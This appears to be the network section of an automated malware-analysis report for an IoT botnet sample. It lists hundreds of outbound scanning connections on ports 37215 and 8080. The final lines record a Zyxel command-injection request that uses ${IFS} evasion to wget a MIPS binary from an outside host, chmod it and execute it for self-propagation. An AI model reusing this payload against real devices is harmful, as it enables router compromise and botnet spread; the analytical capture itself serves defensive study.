          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 112.178.62.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.123.181.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 216.138.131.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.216.180.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.168.109.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 153.72.197.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.30.214.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.245.244.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 160.178.174.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.114.4.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.42.192.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.182.119.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.200.38.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.105.235.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.247.226.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.243.94.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 91.77.175.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.78.171.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 103.160.96.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.61.56.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.142.64.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.33.137.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.107.52.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.225.30.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 152.102.49.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.189.190.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.229.203.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.254.166.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 24.163.68.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.128.79.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.49.27.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.37.74.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 85.1.41.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.147.162.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.214.140.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.114.177.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.40.156.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.74.240.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.183.26.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.183.66.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.27.3.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.160.205.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.178.116.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.250.18.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.209.176.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.194.230.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.174.222.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.145.49.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.26.175.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.48.57.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.203.204.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.235.228.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 160.187.17.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 46.172.37.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.16.93.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.164.94.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.152.222.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.107.27.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.238.215.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.11.169.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.177.183.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.238.58.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.123.84.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.213.191.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 165.60.90.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.232.165.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.218.124.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.68.121.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 90.15.144.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.153.107.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.84.31.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.21.244.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.156.217.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.206.242.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.127.157.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 183.206.49.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.155.138.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.140.10.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.198.69.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.90.206.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 134.171.128.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.164.51.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.88.154.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 44.30.204.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 40.46.209.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.108.123.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.48.239.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 197.138.198.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 14.180.96.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.226.240.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.117.251.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 38.79.46.146:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 191.242.174.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.109.10.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.73.158.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 157.137.230.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.147.36.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.169.67.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.127.157.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:33828 -> 41.179.211.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 122.22.13.41:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 200.143.68.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 168.223.243.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 141.128.245.20:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 108.41.119.41:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 212.81.233.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 70.239.10.144:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 194.128.232.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 211.159.64.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 102.209.94.117:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 193.93.21.60:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 202.169.30.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 124.171.97.183:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 147.126.142.196:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 133.211.147.178:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 20.157.43.23:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 51.232.196.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 61.143.140.125:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 51.183.219.239:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 209.192.233.220:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 12.68.142.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 183.222.41.129:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 31.209.250.160:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 53.152.197.19:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 206.66.81.80:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 13.69.100.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 1.41.94.16:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 158.42.32.91:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 78.139.13.229:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 158.226.207.195:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 144.175.207.174:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 31.135.210.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 17.62.34.251:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 44.124.231.254:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 45.184.250.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 66.125.21.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 164.154.200.233:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 194.54.34.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 115.210.156.46:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 25.10.161.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 60.186.107.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 191.163.225.25:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 19.220.111.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 183.219.194.49:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 134.182.29.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 158.25.243.43:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 35.154.237.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 83.220.180.169:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 143.154.166.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 157.203.150.95:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 145.38.102.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 73.76.164.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 13.207.80.215:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 97.193.95.0:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 36.164.157.152:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 17.209.80.114:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 126.184.235.117:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 1.99.4.110:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 122.164.69.202:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 154.3.58.99:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 165.222.6.79:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 137.9.125.229:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 32.88.202.196:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 107.107.248.179:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 182.178.133.35:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 100.31.13.32:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 18.111.254.73:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 57.189.227.153:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 76.176.204.21:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 164.236.146.166:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 138.209.24.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 61.14.31.80:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 43.221.36.13:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 195.92.83.85:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 152.81.66.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 48.79.56.221:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 67.58.49.111:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 2.248.152.48:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 183.248.244.38:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 147.50.85.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 166.172.226.2:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 12.168.39.97:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 109.160.221.34:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 85.123.221.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 183.116.208.238:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 208.162.187.27:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 64.54.81.99:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 131.6.196.228:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 98.32.98.249:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 12.62.202.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 152.220.18.203:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 12.2.241.139:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 25.247.195.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 107.160.101.153:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 43.30.177.37:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 194.204.184.255:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 160.255.8.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 189.125.54.184:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 81.162.90.186:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 87.167.185.149:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 69.212.86.119:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 157.234.27.201:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 200.37.92.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 162.243.219.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 179.87.187.30:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 44.168.109.108:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 152.250.201.146:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 146.151.156.78:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 12.213.55.200:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 195.241.228.102:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 211.192.210.127:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 90.26.183.1:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 182.131.29.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 100.62.60.44:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 8.133.236.81:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 101.250.124.113:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 155.83.253.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 197.43.63.235:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 187.19.51.240:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 208.185.87.162:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 145.78.206.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 198.196.46.230:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 154.148.51.46:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 203.223.156.130:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 57.77.205.187:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 70.190.55.244:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 36.22.14.242:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 203.2.129.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 173.77.149.158:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 87.15.215.112:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 156.101.200.13:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 23.248.178.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 79.234.179.45:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 181.135.151.150:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 121.132.194.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 203.185.251.201:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 151.20.86.42:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 19.219.150.168:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 138.181.224.102:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 44.58.132.138:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 93.118.198.219:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 72.39.203.52:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 60.131.124.245:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 24.220.95.47:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 121.174.35.156:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 167.32.112.33:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 68.21.135.246:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 158.8.100.252:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 17.172.71.88:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 101.188.132.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 23.10.251.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 155.124.223.161:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 131.42.60.254:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 60.142.110.207:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 85.184.29.163:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 85.124.79.4:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 97.200.89.185:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 204.64.151.214:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 14.38.139.14:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 222.33.153.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 9.0.247.105:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 25.123.50.61:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 160.47.3.124:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 126.174.129.148:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 47.111.232.90:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 178.63.11.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 133.145.17.180:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 223.207.18.120:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 75.161.59.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 120.243.161.75:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 38.198.57.72:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 175.75.75.66:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 189.233.218.76:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 76.243.48.171:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 130.174.231.74:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 164.141.241.213:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 210.130.138.177:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 129.246.212.214:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 1.102.175.37:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 207.45.125.87:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 39.223.149.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 40.0.167.217:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 90.219.210.78:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 63.175.73.170:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 18.48.238.35:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 107.99.210.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 171.88.195.90:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 201.79.178.17:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 140.114.136.36:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 180.108.139.236:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 147.191.208.251:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 80.14.92.199:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 133.240.215.3:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 24.203.178.228:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 159.52.25.215:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 138.64.112.181:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 45.101.177.184:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 103.241.102.182:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 140.223.112.126:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 138.200.34.82:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 173.115.182.19:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 19.71.76.136:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 197.205.13.121:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 156.113.177.156:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 157.188.74.91:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 212.202.150.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 158.232.255.93:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 75.90.11.25:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 75.250.124.45:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 14.73.74.248:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 129.44.213.85:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 160.165.166.205:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 190.242.92.87:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 132.33.34.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 37.31.205.183:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 174.103.158.15:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 207.196.51.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 121.227.143.49:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 51.221.148.223:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 37.159.190.177:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 147.188.98.133:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 143.0.197.147:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 72.201.194.67:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 23.190.82.24:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 121.11.121.69:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 206.182.67.227:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 160.237.176.41:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 202.69.62.250:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 189.225.190.65:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 122.150.137.68:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 100.168.42.113:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 73.155.92.6:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 79.57.106.11:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 217.194.217.202:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 23.22.188.202:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 102.238.75.101:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 208.116.177.241:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 168.53.154.132:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 173.63.239.216:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 180.218.219.234:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 41.41.41.123:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 69.231.127.141:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 17.79.154.9:8080
          Source: global trafficTCP traffic: 192.168.2.23:35108 -> 2.94.226.43:8080
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
